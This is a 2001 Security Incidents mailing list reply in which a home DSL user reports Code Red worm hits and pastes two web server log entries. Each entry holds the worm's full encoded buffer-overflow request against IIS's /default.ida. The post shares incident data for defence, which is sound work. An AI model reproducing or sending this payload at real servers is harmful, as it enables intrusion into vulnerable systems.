Security Incidents mailing list archives

Re: Code Red, anyone?

From: "Chris A. Mattingly" <camattin () camattin com>
Date: Wed, 1 Aug 2001 12:19:25 -0400 (EDT)


I have just a single IP at home (DSL), and have seen two code red attempts
come across thus far:

xxx.reverse.mobilenetics.com - - [01/Aug/2001:06:53:15 -0400]
"GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 325 "-" "-"
xxx.snfc21.pacbell.net - - [01/Aug/2001:12:01:41 -0400]
"GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 325 "-" "-"

Timestamps are EDT (GMT-0400).

-Chris



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

RE: Code Red, anyone?, (continued)
- - RE: Code Red, anyone? Chip McClure (Aug 01)
- RE: Code Red, anyone? Jürgen Nieveler (Aug 01)
  - Re: Code Red, anyone? Seth Arnold (Aug 01)
- Re: Code Red, anyone? Pat Wilson (Aug 01)
  - Re: Code Red, anyone? jan (Aug 01)
  - Re: Code Red, anyone? Pluto (Aug 01)
- RE: Code Red, anyone? Thompson, John J (Aug 01)
- Re: Code Red, anyone? Alfred Huger (Aug 01)
  - Re: Code Red, anyone? Dirk Brockhausen (Aug 01)
  - Re: Code Red, anyone? Johannes B. Ullrich (Aug 01)
- Re: Code Red, anyone? Chris A. Mattingly (Aug 01)
- Re: Code Red, anyone? Ivan Andres Hernandez Puga (Aug 01)
- RE: Code Red, anyone? kerveros (Aug 01)
- RE: Code Red, anyone? Joe Lareau (Aug 01)